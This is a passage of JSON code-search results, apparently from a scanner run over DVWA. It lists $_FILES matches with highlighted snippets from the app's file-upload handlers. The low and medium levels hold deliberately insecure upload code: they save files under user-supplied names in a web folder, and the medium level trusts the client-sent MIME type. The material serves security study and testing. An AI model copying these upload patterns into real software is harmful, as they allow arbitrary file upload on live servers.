punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> ",
"line": 9,
"start": 4,
"end": 15,
"severity": "unknown",
"note": ""
},
{
"id": 258,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_FILES",
"match": "<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span> <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'type'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$uploaded_tmp</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'hackable/uploads/'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 11,
"start": 6,
"end": 17,
"severity": "unknown",
"note": ""
},
{
"id": 259,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_FILES",
"match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span> <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t<span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'type'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$uploaded_tmp</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'hackable/uploads/'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token variable\">$target_file</span> <span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'-'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 12,
"start": 7,
"end": 18,
"severity": "unknown",
"note": ""
},
{
"id": 260,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_FILES",
"match": "<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span> <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'type'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">13:</span> \t<span class=\"token variable\">$uploaded_tmp</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'hackable/uploads/'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token variable\">$target_file</span> <span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'-'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$target_file</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 13,
"start": 8,
"end": 19,
"severity": "unknown",
"note": ""
},
{
"id": 266,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/low.php",
"filetype": "php",
"search": "\\s\\$_FILES",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Can we move the file <span class=\"token keyword\">to</span> the upload folder<span class=\"token operator\">?</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">move_uploaded_file</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> No\n<span class=\"line-number\">11:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'<pre>Your image was not uploaded.</pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 6,
"start": 1,
"end": 12,
"severity": "unknown",
"note": ""
},
{
"id": 267,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/low.php",
"filetype": "php",
"search": "\\s\\$_FILES",
"match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Can we move the file <span class=\"token keyword\">to</span> the upload folder<span class=\"token operator\">?</span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">move_uploaded_file</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> No\n<span class=\"line-number\">11:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'<pre>Your image was not uploaded.</pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \t}\n<span class=\"line-number\">13:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">14:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Yes!",
"line": 9,
"start": 4,
"end": 15,
"severity": "unknown",
"note": ""
},
{
"id": 269,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/medium.php",
"filetype": "php",
"search": "\\s\\$_FILES",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'type'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 6,
"start": 1,
"end": 12,
"severity": "unknown",
"note": ""
},
{
"id": 270,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/medium.php",
"filetype": "php",
"search": "\\s\\$_FILES",
"match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'type'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"image/jpeg\"</span> || <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"image/png\"</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span>",
"line": 9,
"start": 4,
"end": 15,
"severity": "unknown",
"note": ""
},
{
"id": 271,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/medium.php",
"filetype": "php",
"search": "\\s\\$_FILES",
"match": "<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'type'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"image/jpeg\"</span> || <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"image/png\"</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\"><</span> <span class=\"token number\">100000</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {",
"line": 10,
"start": 5,
"end": 16,
"severity": "unknown",
"note": ""
},
{
"id": 272,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/medium.php",
"filetype": "php",
"search": "\\s\\$_FILES",
"match": "<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'type'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"image/jpeg\"</span> || <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"image/png\"</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\"><</span> <span class=\"token number\">100000</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">16:</span> ",
"line": 11,
"start": 6,
"end": 17,
"severity": "unknown",
"note": ""
},
{
"id": 273,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/medium.php",
"filetype": "php",
"search": "\\s\\$_FILES",
